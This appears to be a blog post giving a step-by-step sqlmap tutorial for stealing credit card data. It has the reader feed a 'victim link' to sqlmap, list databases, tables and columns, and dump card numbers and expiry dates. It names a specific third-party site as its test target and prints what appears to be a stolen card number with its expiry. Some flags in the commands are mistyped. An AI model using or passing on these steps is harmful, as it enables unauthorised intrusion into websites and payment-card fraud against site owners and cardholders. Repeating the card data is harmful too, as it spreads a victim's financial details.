SQLMAP TUTORIAL FOR Credit cards
Hello guyz Jorge Here ;)
Tools you will need
click above to download,
First.. After you download and install python you must download Sqlmap for windows
After download it .. [Sqlmap Windows]
extract the file in Drive C
After that open your Command Promp (CMD)
Type cd\
And then press ENTER
Type cd sqlmap\
And Enter
Copy your victim link
And type to cmd like this
sqlmap.py -u http://yoursite.com/index.php?id=123 --dbs
Replace http://yoursite.com/index.php?id=123 to your link target
Enter!
-----------------------------------------------------------------------------------------------------------
The injected site will show the Database
My testing site http://ditto3d.com/gallery.php?id=7
Example Database Shown Is : ditto3d
information_schema
If you want choose any database
you must do like shown above
sqlmap.py -u http://yoursite.com/index.php?id=123=7 -D databasename
-----------------------------------------------------------------------------------------------------------
-D (for Database)
databasename for example i put 'ditto3d' for get the table
So my site will like this
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d --tables
For your site
--> sqlmap.py -u http://yoursite.com/index.php?id=123 -D your database --tables
Press Enter!
you will get a lot of tables
such as
[ users ]
[ category ]
[ links ]
[payments]
[cart]
from the tables , choose one of your target to get Credit cards information
then your code in cmd will be like this
sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database -T your target tables
like i chose for payments
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T payments
-----------------------------------------------------------------------------------------------------------
Alright , we go to the next
what you must do is to get column
just add --columns after your code
it will be show like this
sqlmap.py -u http://www.yoursite.com/index.php?id=123 -D database T- your target tables --columns
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users --columns
-----------------------------------------------------------------------------------------------------------
The tables will show the columns
such as users contain :
[ cc]
[ exp]
[ name ]
[ address line 1]
[ address line 2]
[zip]
[ state]
[country]
[phone]
[email]
what you must to do is
adding -C cc --dump behind
example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d -T payments -C cc --dump
Yes you get it
cc is : 4744751222661499
then do the same thing , but this to get rest details
Example :
sqlmap.py -u http://ditto3d.com/gallery.php?id=7 -D ditto3d T- users -C exp --dump
The exp is : 0818 >>> mean 08/2018
-----------------------------------------------------------------------------------------------------------
Warning! : If you get the database , tables and columns
'' -- '' this string must be a one
such as like this
from database
--> after injected
--> the database are showed
the word database and the double string ( -- )
will be change
it will be like -D
the word database will short and be D
the word D must be a big word
-T / -C
( --dump ) do not change this string
After the big word such as -D
You must give one space
---> -D database
0 comments:
Post a Comment
!!!THANK YOU VISITING OUR BLOG!!!